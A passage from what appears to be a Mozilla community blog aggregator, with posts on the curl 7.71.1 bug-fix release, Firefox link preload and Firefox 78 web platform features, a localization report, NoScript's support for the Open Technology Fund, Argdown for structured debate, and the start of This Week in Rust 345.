Every early patch release we do is a minor failure in our process as it means we shipped annoying/serious bugs. That of course tells us that we didn’t test all features and areas well enough before the release. I apologize.

Numbers

the 193rd release
0 changes
7 days (total: 8,139)

18 bug fixes (total: 6,227)
32 commits (total: 25,943)
0 new public libcurl function (total: 82)
0 new curl_easy_setopt() option (total: 277)

0 new curl command line option (total: 232)
16 contributors, 8 new (total: 2,210)
5 authors, 2 new (total: 805)
0 security fixes (total: 94)
0 USD paid in Bug Bounties

Bug-fixes

compare cert blob when finding a connection to reuse – when specifying the client cert to libcurl as a “blob”, it needs to compare that when it subsequently wants to reuse a connection, as curl already does when specifying the certificate with a file name.

curl_easy_escape: zero length input should return a zero length output – a regression when I switched over the logic to use the new dynbuf API: I inadvertently modified behavior for escaping an empty string which then broke applications. Now verified with a new test.

set the correct URL in pushed HTTP/2 transfers – the CURLINFO_EFFECTIVE_URL variable previously didn’t work for pushed streams. They would all just claim to be the parent stream’s URL.

fix HTTP proxy auth with blank password – another dynbuf conversion regression that now is verified with a new test. curl would pass in “(nil)” instead of a blank string (“”).

terminology: call them null-terminated strings – after discussions and an informal twitter poll, we’ve rephrased all documentation for libcurl to use the phrase “null-terminated strings” and nothing else.

allow user + password to contain “control codes” for HTTP(S) – previously byte values below 32 would maybe work but not always. Someone with a newline in the user name reported a problem. It can be noted that those kind of characters will not work in the credentials for most other protocols curl supports.

Reverted the implementation of “wait using winsock events” – another regression that apparently wasn’t tested well enough before it landed, and we take the opportunity here to move back to the solution we had before. This change will probably take another round and aim to land in better shape in a future release.

ngtcp2: sync with current master – interestingly enough, the ngtcp2 project managed to yet again update their API exactly this week between these two curl releases. This means curl 7.71.1 can be built against the latest ngtcp2 code to speak QUIC and HTTP/3.

In parallel with that ngtcp2 sync, I also ran into a new problem with BoringSSL’s master branch that is fixed now. Timely for us, as we can now also boast about having the quiche backend in sync and speaking HTTP/3 fine with the latest and most up-to-date software.

Next

We have not updated the release schedule. This means we will have almost three weeks for merging new features, then four weeks of bug-fixing only, until we ship another release on August 19 2020. And on and on we go.

Honza BambasFirefox enables link rel=”preload” support

We enabled the link preload web feature support in Firefox 78, at this time only on the Nightly channel and Firefox Early Beta, not Firefox Release, because of pending deeper product integrity checking and performance evaluation.

What is “preload”

Web developers may use the Link: <..>; rel=preload response header or <link rel="preload"> markup to give the browser a hint to preload some resources with a higher priority and in advance.

Firefox can now preload a number of resource types, such as styles, scripts, images and fonts, as well as responses to be later consumed by plain fetch() and XHR. Use preload in a smart way to help the web page render and reach a stable, interactive state faster.

Don’t mistake this for “prefetch”. Prefetching (with a similar technique using <link rel="prefetch"> tags) loads resources for the next user navigation that is likely to happen. The browser fetches those resources with a very low priority, without affecting the currently loading page.

Web Developer Documentation

There is Mozilla-provided MDN documentation on how to use <link rel="preload">, definitely worth reading for the details. Explaining how to use preload is not in the scope of this post, anyway.

Implementation overview

Firefox parses the document’s HTML in two phases: a prescan (also called speculative) phase and the actual DOM tree building.

The prescan phase only quickly tokenizes tags and attributes and starts so-called “speculative loads” for the tags it finds; this is handled by resource loaders specific to each type. A preload is just another type of speculative load, but with a higher priority. We limit speculative loads to one per URL, so only the first tag referring to that URL starts a speculative load. Hence, if the consuming tag comes first and the related <link preload> tag for the same URL only comes later, the speculative load will only have a regular priority.

At the DOM tree building phase, during which we create the actual consuming DOM node representations, the respective resource loader first looks for an existing speculative load and uses it instead of starting a new network load. Note that except for stylesheets and images, a speculative load is used only once; after that it’s removed from the speculative load cache.

Firefox preload behavior

Supported types

“style”, “script”, “image”, “font”, “fetch”.

The “fetch” type is for use by fetch() or XHR.
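
As a minimal sketch (the URL is hypothetical), a “fetch” preload can be started from script and the response consumed later with fetch(). For the preload to be reused, the CORS and credentials modes of the two requests have to match, which is why crossorigin="anonymous" is paired here with fetch()’s default credentials mode:

// Start a high-priority preload for a JSON resource (hypothetical URL).
const link = document.createElement("link");
link.rel = "preload";
link.as = "fetch";
link.href = "/api/dashboard.json";
link.crossOrigin = "anonymous"; // matches fetch()'s default "same-origin" credentials mode
document.head.appendChild(link);

// Later, when the data is actually needed, this fetch should pick up the preload.
fetch("/api/dashboard.json")
  .then((response) => response.json())
  .then((data) => console.log(data));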

The “error” event notification

Conditions for delivering the error event in Firefox are slightly different from those in e.g. Chrome.

For all resource types we trigger the error event when there is a network connection error (but not a DNS error – we taint the error event for cross-origin requests and fire load instead) or on an error response from the server (e.g. 404).

Some resource types also fire the error event when the MIME type of the response is not supported for that resource type; this applies to style, script and image. The style type also produces the error event when not all of its @imports are successful.
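
For instance, a page can watch for these outcomes from script; a minimal sketch, assuming a single preload link in the markup:

const preloadLink = document.querySelector('link[rel="preload"]');
preloadLink.addEventListener("load", () => console.log("preload succeeded"));
preloadLink.addEventListener("error", () => {
  // Fired on a connection error, an error response such as 404, or (for the
  // style, script and image types) an unsupported MIME type.
  console.log("preload failed");
});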

Coalescing

If there are two or more <link rel="preload"> tags before the consuming tag, all mapping to the same resource, they all coalesce to the same speculative preload, each delivers its event notifications, and only one network load is started.

If there is a <link rel="preload"> tag after the consuming tag, then it will start a new preload network fetch during the DOM tree building phase.

Sub-resource Integrity

Handling of the integrity metadata for Sub-resource integrity checking (SRI) is a little bit more complicated. For <link rel=preload> it’s currently supported only for the “script” and “style” types.

The rules are: for the first tag referring to a resource that we hit during the prescan phase, either a <link preload> or a consuming tag, we start the fetch with SRI set up according to that tag’s integrity attribute. All other tags matching the same resource (URL) are ignored during the prescan phase, as mentioned earlier.

At the DOM tree building phase, the consuming tag reuses the preload only if the consuming tag:

  • is missing the integrity attribute completely,
  • has exactly the same integrity value as the preload tag,
  • or has a “weaker” value, meaning the hash algorithm of the consuming tag is weaker than the hash algorithm of the <link preload> tag.

Otherwise, the consuming tag starts a completely new network fetch with a differently configured SRI.

As link preload is an optimization technique, we start the network fetch as soon as we encounter the tag. If the preload tag doesn’t specify integrity, then a consuming tag found later can’t enforce integrity checking on that running preload, because we don’t want to cache the data unnecessarily, which would cost memory and complexity.

Doing something like the following is considered a website bug and causes the browser to do two network fetches:

<link rel="preload" as="script" href="script1.js">
<script src="script1.js" integrity="sha512-....">

The correct way is:

<link rel="preload" as="script" href="script1.js" integrity="sha512-....">
<script src="script1.js">

Specification

The main specification is under W3C jurisdiction here. Preload is also woven into the WHATWG Fetch specification.

The W3C specification is very vague and doesn’t make many things clear; some of them are:

  • Which types, or which minimal set of types, the browser must or should support. This is particularly bad because specifying an unsupported type fires neither the load nor the error event on the <link> tag, so a web page can’t detect an unsupported type.
  • What are the exact conditions to fire the error event.
  • How exactly to handle (coalesce) multiple <link rel="preload"> tags for the same resource.
  • Whether, and how exactly, to handle a <link rel="preload"> found after the consuming tag.
  • How exactly to handle the integrity attribute on both the <link preload> and the consuming tag, specifically when it’s missing on one of them or differs between the two, and also how to handle integrity on multiple link preload tags.

The post Firefox enables link rel=”preload” support appeared first on mayhemer's blog.

Mozilla Localization (L10N)L10n Report: June 2020 Edition

Welcome!

New community/locales added

New content and projects

What’s new or coming up in Firefox desktop

Deadlines

Upcoming deadlines:

  • Firefox 78 is currently in beta and will be released on June 30. The deadline to update localizations was on June 16.
  • The deadline to update localizations for Firefox 79, currently in Nightly, will be July 14 (4 weeks after the previous deadline).
Fluent and migration wizard

Going back to the topic of how to use Fluent’s flexibility to your advantage, we recently ported the Migration Wizard to Fluent. That’s the dialog displayed to users when they import content from other browsers.

Before Fluent, this is how the messages for “Bookmarks” looked:

32_ie=Favorites
32_edge=Favorites
32_safari=Bookmarks
32_chrome=Bookmarks
32_360se=Bookmarks

That’s one string for each supported browser, even if they’re all identical. This is how the same message looks in Fluent:

browser-data-bookmarks-checkbox =
  .label = { $browser ->
     [ie] Favorites
     [edge] Favorites
    *[other] Bookmarks
  }

If all browsers use the same translations in a specific language, this can take advantage of the asymmetric localization concept available in Fluent, and be simplified (“flattened”) to just:

browser-data-bookmarks-checkbox =
  .label = Translated_bookmarks

The same is true the other way around. The section comment associated with this group of strings says:

## Browser data types
## All of these strings get a $browser variable passed in.
## You can use the browser variable to differentiate the name of items,
## which may have different labels in different browsers.
## The supported values for the $browser variable are:
##   360se
##   chrome
##   edge
##   firefox
##   ie
##   safari
## The various beta and development versions of edge and chrome all get
## normalized to just "edge" and "chrome" for these strings.

So, if English has a flat string without selectors:

browser-data-cookies-checkbox =
    .label = Cookies

A localization can still provide variants if, for example, Firefox is using a different term for cookies than other browsers:

browser-data-cookies-checkbox =
    .label = { $browser ->
        [firefox] Macarons
       *[other] Cookies
}
HTTPS-Only Error page

There’s a new mode, called “HTTPS-Only”, currently tested in Nightly: when users visit a page not available with a secure connection, Firefox will display a warning.

In order to test this page, you can change the value of the dom.security.https_only_mode preference in about:config, then visit this website. Make sure to test the page with the window at different sizes, to make sure all elements fit.

What’s new or coming up in mobile

Concerning mobile right now, we just got updated screenshots for the latest v27 of Firefox for iOS: https://drive.google.com/drive/folders/1ZsmHA-qt0n8tWQylT1D2-J4McjSZ-j4R

We are trying out several options for screenshots going forward, so stay tuned so you can tell us which one you prefer.

Otherwise our Fenix launch is still in progress. We are string frozen now, so if you’d like to catch up and test your work, it’s this way: https://pontoon.mozilla.org/projects/android-l10n/tags/fenix/

You should have until July 18th to finish all l10n work on this project, before the cut-off date.

What’s new or coming up in web projects

Firefox Accounts

A third file called main.ftl was added to Pontoon a couple of weeks ago in preparation for supporting subscription-based products. This component contains payment strings for the subscription platform, which will be rolled out to a few countries initially. The staging server will be opened up for localization testing in the coming days. An email with testing instructions and information on supported markets will be sent out as soon as all the information is gathered and confirmed. Stay tuned.

Mozilla.org

In the past month, several dozen files were added to Pontoon, including new pages. Many of the migrated pages include updates. To help prioritize, please focus on

  • resolving the orange warnings first. This usually means that a brand or product name was not converted in the process. Placeables no longer match those in English.
  • completing translation one page at a time. Coordinate with other community members, splitting up the work page by page, and conduct peer review.

Speaking of brands, the browser comparison pages are laden with brand names, product names, and well-known company names. Not all of the brand names went into brands.ftl, because some of them are mentioned only once or twice, or are limited to just one file; we do not want to overload brands.ftl with too many of these rarely used names. The general rule for these third-party brand and product names is to keep them unchanged whenever possible.

We skipped WNP#78 but we will have WNP#79 ready for localization in the coming weeks.

Transvision now supports mozilla.org in Fluent format. You can leverage the tool the same way you did before.

What’s new or coming up in Foundation projects

Donate websites

Back in November last year, we mentioned we were working on making the remaining content (the content stored in a CMS) of the new donate website localizable. The site was launched in February, but the CMS localization systems still need some work before the CMS-based content can be properly localized.

Over the next few weeks, Théo will be working closely with the makers of the CMS the site is using, to fix the remaining issues, develop new localization capabilities and enable CMS content localization.

Once the systems are operational, and if you’re already translating the Donate website UI project, we will add two new projects with the remaining content to your dashboard: one for the Thunderbird instance and another one for the Mozilla instance. The vast majority of this content has already been translated, so you should be able to leverage previous translations using the translation memory feature in Pontoon. But because some longer strings may have been split differently by the system, they may not show up in translation memory. For this reason, we will re-enable the old “Fundraising” project in Pontoon, in read-only mode, so that you can easily search and access those translations if you need to.

What’s new or coming up in Pontoon

  • Translate Terminology. We’ve added a new Terminology project to Pontoon, which contains all terms from Mozilla’s termbase and lets you translate them. As new terms are added to Pontoon, they will instantly appear in the project, ready for translation. There’s also a “Translate” link next to each term in the Terms tab and panel, which makes it easy to translate terms as they are used.
  • More relevant API results. Thanks to Vishnudas, system projects (e.g. Tutorial) are now excluded from the default list of projects returned by the API. You can still include system projects in the response if you set the includeSystem flag to true.

Events

  • Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver, and we’ll include that (see links to emails at the bottom of this report)

Friends of the Lion

  • Robb P., who has not only become a top localizer for the Romanian community, but also a reliable and proactive contributor.

Know someone in your l10n community who’s been doing a great job and should appear here? Contact one of the l10n-drivers and we’ll make sure they get a shout-out (see list at the bottom)!

Giorgio MaoneSave Trust, Save OTF

OTF-funded security/privacy FLOSS

As the readers of this blog almost surely know, I'm the author of NoScript, a web browser security enhancer which can be installed on Firefox and Chrome, and comes built-in with the Tor Browser.

NoScript has received support by the Open Technology Fund (OTF) for specific development efforts: especially, to make it cross-browser, better internationalized and ultimately serving a wider range of users.

OTF's mission is supporting technology to counter surveillance and censorship by repressive regimes and foster Internet Freedom. One critical and strict requirement for OTF to fund or otherwise help software projects is that they be licensed as Free/Libre Open Source Software (FLOSS), i.e. their code is publicly available for inspection, modification and reuse by anyone. Among the successful projects funded by OTF you may know or use Signal, Tor, Let's Encrypt, Tails, Qubes OS, Wireshark, OONI and GlobaLeaks. Millions of users all around the world, no matter their political views, trust them because they are FLOSS, which makes vulnerabilities and even intentionally malicious code harder to hide.

Now this virtuous modus operandi is facing an existential threat, which started when the whole OTF leadership was fired and replaced by Michael Pack, the controversial new CEO of the U.S. Agency for Global Media (USAGM), the agency OTF reports to.

Lobbying documents emerged on the eve of former OTF CEO Libby Liu's defenestration, strongly suggesting this purge is a prelude to a push to de-fund FLOSS, and especially "p2p, privacy-first" tools, in favor of large-scale, centralized and possibly proprietary "alternatives": two closed source commercial products are explicitly named among the purportedly best recipients of funding.

Besides the weirdness of seeing "privacy-first" used as a pejorative when talking about technologies protecting journalists and human rights defenders from repressive regimes such as Iran or the People's Republic of China (even more now, while the so-called "Security Law" is enforced against Hong Kong protesters), I find very alarming the lack of recognition of how radically important it is for these tools to be open source if they are to be trusted by their users, no matter the country or the fight they're in, when their lives are at risk.

Talking of my own experience (but I'm confident most other successful and effective OTF-funded software projects have similar stories to tell): I've been repeatedly approached by law enforcement representatives from different countries (including the PRC) - and also by less "formal" groups - with a mix of allegedly noble reasons, interesting financial incentives and veiled threats, to put ad-hoc backdoors in NoScript. I could deny all such requests not because of any exceptional moral fiber of mine, even though being part of the "OTF community", where the techies who build the tools meet the human rights activists who use them in the field, helped me grow awareness of my responsibilities. I could say "no" just because NoScript being FLOSS made it impractical/suicidal: everyone, looking at the differences in the source code, could spot the backdoor, and I would lose any credibility as a security software developer. NoScript would be forked, in the best case scenario, or dead.

The strict FLOSS requirement is only one of the great features of OTF's transparent, fair, competitive and evidence-based award process, but I believe it's the best assurance that we can actually trust our digital freedom tools.

I'm aware of (very few) other organizations and funds adopting similar criteria, and likely managing larger budgets too, especially in Europe: so if the USA really decides to give up its leadership in the Internet Freedom space, NoScript and other tools such as Tor, Tails or OONI would still have a door to knock on.

But none of these entities, AFAIK, own OTF's "secret sauce": bringing together technologists and users in a unique, diverse and inclusive community of caring humans, where real and touching stories of oppression and danger are shared in a safe space, and help shape effective technology which can save lives.

So please, do your part to save Internet Freedom, save OTF, save trust.

Dzmitry MalyshauMissing structure in technical discussions

People are amazing creatures. When discussing a complex issue, they are able to keep multiple independent arguments in their heads, the pieces of supporting and disproving evidence, and can collapse this system into a concrete solution. We can spend hours navigating through the issue comments on Github, reconstructing the points of view, and making sense of the discussion. Problem is: we don’t actually want to apply this superpower and waste time nearly as often.

Problem with technical discussions

Have you heard of async in Rust? Ever wondered why the core team opted into a completely new syntax for this feature? Let’s dive in and find out! Here is #57640 with 512 comments, kindly asking everyone to check #50547 (with just 308 comments) before expressing their point of view. Following this discussion must have been exhausting. I don’t know how it would be possible to navigate it without the summary comments.

Another example is the loop syntax in WebGPU. Issue #569 has only 70 comments, with multiple attempts to summarize the discussion in the middle. It would probably take a few hours at the minimum to get a gist of the group reasoning for somebody from the outside. And that doesn’t include the call transcripts.

Github has emoji reactions that allow readers to show support for certain comments. Unfortunately, our nature is such that comments get liked when we agree with them, not when they advance the discussion in a constructive way. They are all over the place and don’t really help.

What would help though is having a non-linear structure for the discussion. Trees! They make following HN and Reddit threads much easier, but they too have problems. Sometimes, a really important comment is buried deep in one of the branches. Plus, trees don’t work well for a dialog, when there is some back-and-forth between people.

That brings us to the point: most technical discussions are terrible. Not in a sense that people can’t make good points and progress through it, but rather that there is no structure to a discussion, and it’s too hard to follow. What I see in reality is a lot of focus from a very few dedicated people, and delegation by the other ones to those focused. Many views get misrepresented, and many perspectives never heard, because the flow of comments quickly filters out most potential participants.

Structured discussion

My first stop in the search of a solution was on Discourse. It is successfully used by many communities, including Rust users. Unfortunately, it still has linear structure, and doesn’t bring a lot to the table on top of Github. Try following this discussion about Rust in 2020 for example.

Then I looked at platforms designed specifically for structured argumentation. One of the most popular today is Kialo. I haven’t done a thorough evaluation of it, but it seemed that Kialo isn’t targeted at engineers, and it’s a platform we’d have to register on to use. Wishing to use Markdown with a system like that, I stumbled upon Argdown, and realized that it concluded my search.

Argdown introduces a syntax for defining the structure of an argument in text. Statements, arguments, propositions, conclusions - it has it all, written simply in your text editor (especially if it’s VS Code, for which there is a plugin), or in the playground. It has command-line tools to produce all sorts of derivatives, like dot graphs, web components, JSON, you name it, from an .argdown file. Naturally, formatting with Markdown in it is also supported.

That discovery led me to two questions. (1) - what would an existing debate look like in such a system? And (2) - how could we shift the workflow towards using one?

So I picked the most contentious topic in WebGPU discussions and tried to reconstruct it. Topic was about choosing the shading language, and why SPIR-V wasn’t accepted. It was discussed by the W3C group over the course of 2+ years, and it’s evident that there is some misunderstanding of why the decision was made to go with WGSL, taking Google’s Tint proposal as a starting point.

I attempted to reconstruct the debate in https://github.com/kvark/webgpu-debate, building the SPIR-V.argdown with the first version of the argumentation graph, solving (1). The repository accepts pull requests that are checked by CI for syntax correctness, inviting everyone to collaborate, solving (2). Moreover, the artifacts are automatically uploaded to Github-pages, rendering the discussion in a way that is easy to explore.

Way forward

I’m excited to have this new way of preserving and growing the structure of a technical debate. We can keep using the code hosting platforms, and arguing on the issues and PR, while solidifying the core points in these .argdown files. I hope to see it applied more widely to the workflows of technical working groups.

Hacks.Mozilla.OrgNew in Firefox 78: DevTools improvements, new regex engine, and abundant web platform updates

A new stable Firefox version rolls out today, providing new features for web developers. A new regex engine, updates to the ECMAScript Intl API, new CSS selectors, enhanced support for WebAssembly, and many improvements to the Firefox Developer Tools await you.

This blog post provides merely a set of highlights; for all the details, check out the following:

Developer tool improvements

Source-mapped variables, now also in Logpoints

With our improvements over the recent releases, debugging your projects with source maps will feel more reliable and faster than ever. But there are more capabilities that we can squeeze out of source maps. Did you know that Firefox’s Debugger also maps variables back to their original name? This especially helps babel-compiled code with changed variable names and added helper variables. To use this feature, pause execution and enable the “Map” option in the Debugger’s “Scopes” pane.

As a hybrid between the worlds of the DevTools Console and Debugger, Logpoints make it easy to add console logs to live code–or any code, once you’ve added them to your toolbelt. New in Firefox 75, original variable names in Logpoints are mapped to the compiled scopes, so references will always work as expected.

Using variable mapping and logpoints in Debugger

To make scope mapping work, ensure that your source maps are correctly generated and include enough data. In webpack this means avoiding the “cheap” and “nosources” options for the “devtool” configuration.
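
For example, a minimal webpack.config.js sketch along these lines (the entry path is hypothetical) produces source maps rich enough for variable mapping:

// webpack.config.js – note the option is "devtool" (singular).
// Avoid "cheap-*" and "nosources-*" variants if you want original
// variable names and sources available in the Debugger.
module.exports = {
  mode: "development",
  entry: "./src/index.js",
  devtool: "source-map", // slowest, but the most complete source maps
};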

Promises and frameworks error logs get more detailed

Uncaught promise errors are critical in modern asynchronous JavaScript, and even more so in frameworks like Angular. In Firefox 78, you can expect to see all details for thrown errors show up properly, including their name and stack:

Before/after comparison for improved error logs

The implementation of this functionality was only possible through the close collaboration between the SpiderMonkey engineering team and a contributor, Tom Schuster. We are investigating how to improve error logging further, so please let us know if you have suggestions.

Monitoring failed request issues

Failed or blocked network requests come in many varieties. Resources may be blocked by tracking protection, add-ons, CSP/CORS security configurations, or flaky connectivity, for example. A resilient web tries to gracefully recover from as many of these cases as possible automatically, and an improved Network monitor can help you with debugging them.

Failed and blocked requests are annotated with additional reasons

Firefox 78 provides detailed reports in the Network panel for requests blocked by Enhanced Tracking Protection, add-ons, and CORS.

Quality improvements

Faster DOM navigation in Inspector

Inspector now opens and navigates a lot faster than before, particularly on sites with many CSS custom properties. Some modern CSS frameworks were especially affected by slowdowns in the past. If you see other cases where Inspector isn’t as fast as expected, please report a performance issue. We really appreciate your help in reporting performance issues so that we can keep improving.

Remotely navigate your Firefox for Android for debugging

Remote debugging’s new navigation elements make it more seamless to test your content for mobile with the forthcoming new edition of Firefox for Android. After hooking up the phone via USB and connecting remote debugging to a tab, you can navigate and refresh pages from your desktop.

Early-access DevTools features in Developer Edition

Developer Edition is Firefox’s pre-release channel. You get early access to tooling and platform features. Its settings enable more functionality for developers by default. We like to bring new features quickly to Developer Edition to gather your feedback, including the following highlights.

Async stacks in Console & Debugger

We’ve built new functionality to better support async stacks in the Console and Debugger, extending stacks with information about the events, timers, and promises that lead to the execution of a specific line of code. We have been improving asynchronous stacks for a while now, based on early feedback from developers using Firefox DevEdition. In Firefox 79, we expect to enable this feature across all release channels.

Async stacks add promise execution for both Console and Debugger

Console shows failed requests

Network requests with 4xx/5xx status codes now log as errors in the Console by default. To make them easier to understand, each entry can be expanded to view embedded network details.

Server responses with 4xx/5xx status responses logged in the Console

Web platform updates

New CSS selectors :is and :where

Version 78 sees Firefox add support for the :is() and :where() pseudo-classes, which allow you to present a list of selectors to the browser. The browser will then apply the rule to any element that matches one of those selectors. This can be useful for reducing repetition when writing a selector that matches a large number of different elements. For example:

header p, main p, footer p,
header ul, main ul, footer ul { … }

Can be cut down to

:is(header, main, footer) :is(p, ul) { … }

Note that :is() is not a particularly new thing—it has been supported for a while in various browsers. Sometimes this has been with a prefix and the name any (e.g. :-moz-any). Other browsers have used the name :matches(). :is() is the final standard name that the CSSWG agreed on.

:is() and :where() basically do the same thing, but what is the difference? Well, :is() counts towards the specificity of the overall selector, taking the specificity of its most specific argument. However, :where() has a specificity value of 0 — it was introduced to provide a solution to the problems found with :is() affecting specificity.

What if you want to add styling to a bunch of elements with :is(), but then later on want to override those styles using a simple selector? You won’t be able to because class selectors have a higher specificity. This is a situation in which :where() can help. See our :where() example for a good illustration.

Styling forms with CSS :read-only and :read-write

At this point, HTML forms have a large number of pseudo-classes available to style inputs based on different states related to their validity — whether they are required or optional, whether their data is valid or invalid, and so on. You can find a lot more information in our UI pseudo-classes article.

In this version, Firefox has enabled support for the non-prefixed versions of :read-only and :read-write. As their name suggests, they style elements based on whether their content is editable or not:

input:read-only, textarea:read-only {
  border: 0;
  box-shadow: none;
  background-color: white;
}

textarea:read-write {
  box-shadow: inset 1px 1px 3px #ccc;
  border-radius: 5px;
}

(Note: Firefox has supported these pseudo-classes with a -moz- prefix for a long time now.)

You should be aware that these pseudo-classes are not limited to form elements. You can use them to style any element based on whether it is editable or not, for example a <p> element with or without contenteditable set:

p:read-only {
  background-color: red;
  color: white;
}

p:read-write {
  background-color: lime;
}

New regex engine

Thanks to the RegExp engine in SpiderMonkey, Firefox now supports all new regular expression features introduced in ECMAScript 2018, including lookbehinds (positive and negative), the dotAll flag, Unicode property escapes, and named capture groups.

Lookbehind assertions (positive and negative) make it possible to find patterns that are (or are not) preceded by another pattern. In the first example below, a negative lookbehind is used to match a number only if it is not preceded by a minus sign. In the second, a positive lookbehind matches only values that are preceded by a minus sign.

'1 2 -3 0 -5'.match(/(?<!-)\d+/g);
// → Array [ "1", "2", "0" ]

'1 2 -3 0 -5'.match(/(?<=-)\d+/g);
// → Array [ "3", "5" ]

Unicode property escapes are written in the form \p{…} and \P{…}. They can be used to match any decimal number in Unicode, for example. Here’s a Unicode-aware version of \d that matches any Unicode decimal number instead of just the ASCII digits 0-9.

const regex = /^\p{Decimal_Number}+$/u;
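
For instance, using the regex defined above (digits chosen for illustration), it accepts non-ASCII digits that plain \d rejects:

console.log(regex.test("٣١٤"));   // → true, Arabic-Indic digits are Decimal_Number
console.log(/^\d+$/.test("٣١٤")); // → false, \d only matches the ASCII digits 0-9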

Named capture groups allow you to refer to a certain portion of a string that a regular expression matches, as in:

let re = /(?<year>\d{4})-(?<month>\d{2})-(?<day>\d{2})/u;
let result = re.exec('2020-06-30');
console.log(result.groups);
// → { year: "2020", month: "06", day: "30" }

ECMAScript Intl API updates

Rules for formatting lists vary from language to language. Implementing your own proper list formatting is neither straightforward nor fast. Thanks to the new Intl.ListFormat API, the JavaScript engine can now format lists for you:

const lf = new Intl.ListFormat('en');
lf.format(["apples", "pears", "bananas"]);
// → "apples, pears, and bananas"

const lfdis = new Intl.ListFormat('en', { type: 'disjunction' });
lfdis.format(["apples", "pears", "bananas"]);
// → "apples, pears, or bananas"

Enhanced language-sensitive number formatting as defined in the Unified NumberFormat proposal is now fully implemented in Firefox. See the NumberFormat constructor documentation for the new options available.
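
A couple of quick sketches of the newly available options (output shown for the en locale):

new Intl.NumberFormat('en', { notation: 'compact' }).format(123456);
// → "123K"

new Intl.NumberFormat('en', { style: 'unit', unit: 'kilometer-per-hour' }).format(50);
// → "50 km/h"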

ParentNode.replaceChildren

Firefox now supports ParentNode.replaceChildren(), which replaces the existing children of a Node with a specified new set of children. This is typically represented as a NodeList, such as that returned by Document.querySelectorAll().

This method provides an elegant way to empty a node of children, if you call replaceChildren() with no arguments. It also is a nice way to shift nodes from one element to another. For example, in this case, we use two buttons to transfer selected options from one <select> box to another:

const noSelect = document.getElementById('no');
const yesSelect = document.getElementById('yes');
const noBtn = document.getElementById('to-no');
const yesBtn = document.getElementById('to-yes');
yesBtn.addEventListener('click', () => {
  const selectedTransferOptions = document.querySelectorAll('#no option:checked');
  const existingYesOptions = document.querySelectorAll('#yes option');
  yesSelect.replaceChildren(...selectedTransferOptions, ...existingYesOptions);
});

noBtn.addEventListener('click', () => {
  const selectedTransferOptions = document.querySelectorAll('#yes option:checked');
  const existingNoOptions = document.querySelectorAll('#no option');
  noSelect.replaceChildren(...selectedTransferOptions, ...existingNoOptions);
});

You can see the full example at ParentNode.replaceChildren().

WebAssembly multi-value support

Multi-value is a proposed extension to core WebAssembly that enables functions to return many values, and enables instruction sequences to consume and produce multiple stack values. The article Multi-Value All The Wasm! explains what this means in greater detail.

WebAssembly large integer support

WebAssembly now supports import and export of 64-bit integer function parameters (i64) using BigInt from JavaScript.
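
As a minimal sketch (the math.wasm module and its add64 export are hypothetical), an exported i64 function can now be called with BigInt values from JavaScript:

// Assumes math.wasm exports add64(i64, i64) -> i64.
WebAssembly.instantiateStreaming(fetch("math.wasm")).then(({ instance }) => {
  // i64 parameters and results are passed as BigInt values.
  const sum = instance.exports.add64(9007199254740993n, 1n);
  console.log(sum); // → 9007199254740994n, beyond Number.MAX_SAFE_INTEGER
});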

WebExtensions

We’d like to highlight three changes to the WebExtensions API for this release:

  • When using proxy.onRequest, a filter that limits based on tab id or window id is now correctly applied. This is useful for add-ons that want to provide proxy functionality in just one window (a minimal sketch follows this list).
  • Clicking within the context menu from the “all tabs” dropdown now passes the appropriate tab object. In the past, the active tab was erroneously passed.
  • When using downloads.download with the saveAs option, the recently used directory is now remembered. While this data is not available to developers, it is very convenient to users.
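
A minimal background-script sketch of the first item above (the window ID and SOCKS proxy details are hypothetical, and the "proxy" permission is required):

// Hypothetical window ID, e.g. obtained earlier from browser.windows.getCurrent().
const targetWindowId = 42;

browser.proxy.onRequest.addListener(
  // Route every request made from that window through a local SOCKS proxy.
  () => ({ type: "socks", host: "127.0.0.1", port: 9050 }),
  { urls: ["<all_urls>"], windowId: targetWindowId }
);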

TLS 1.0 and 1.1 removal

Support for the Transport Layer Security (TLS) protocol’s versions 1.0 and 1.1 has been dropped from all browsers as of Firefox 78 and Chrome 84. Read TLS 1.0 and 1.1 Removal Update for the previous announcement and what actions to take if you are affected.

Firefox 78 is an ESR release

Firefox follows a rapid release schedule: every four weeks we release a new version of Firefox.

In addition to that, we provide a new Extended Support Release (ESR) for enterprise users once a year. Firefox 78 ESR includes all of the enhancements since the last ESR (Firefox 68), along with many new features to make your enterprise deployment easier.

A noteworthy feature: In previous ESR versions, Service workers (and the Push API) were disabled. Firefox 78 is the first ESR release to support them. If your enterprise web application uses AppCache to provide offline support, you should migrate to these new APIs as soon as possible as AppCache will not be available in the next major ESR in 2021.

Firefox 78 is the last supported Firefox version for macOS users of OS X 10.9 Mavericks, OS X 10.10 Yosemite and OS X 10.11 El Capitan. These users will be moved to the Firefox ESR channel by an application update. For more details, see the Mozilla support page.

See also the release notes for Firefox for Enterprise 78.

The post New in Firefox 78: DevTools improvements, new regex engine, and abundant web platform updates appeared first on Mozilla Hacks - the Web developer blog.

This Week In RustThis Week in Rust 345

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Check out this week's This Week in Rust Podcast

Updates from Rust Community

News & Blog Posts

Crate of the Week

This week's crate is print_bytes, a library to print arbitrary bytes to a stream as losslessly as possible.

Thanks to dylni for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

339 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-06-30. Three regressions, two of them on rollups; two improvements, one on a rollup.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online
North America
Asia Pacific

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

References are a sharp tool and there are roughly three different approaches to sharp tools.

  1. Don't give programmers sharp tools. They may make mistakes and cut their fingers off. This is the Java/Python/Perl/Ruby/PHP... approach.
  2. Give programmers all the sharp tools they want. They are professionals and if they cut their fingers off it's their own fault. This is the C/C++ approach.
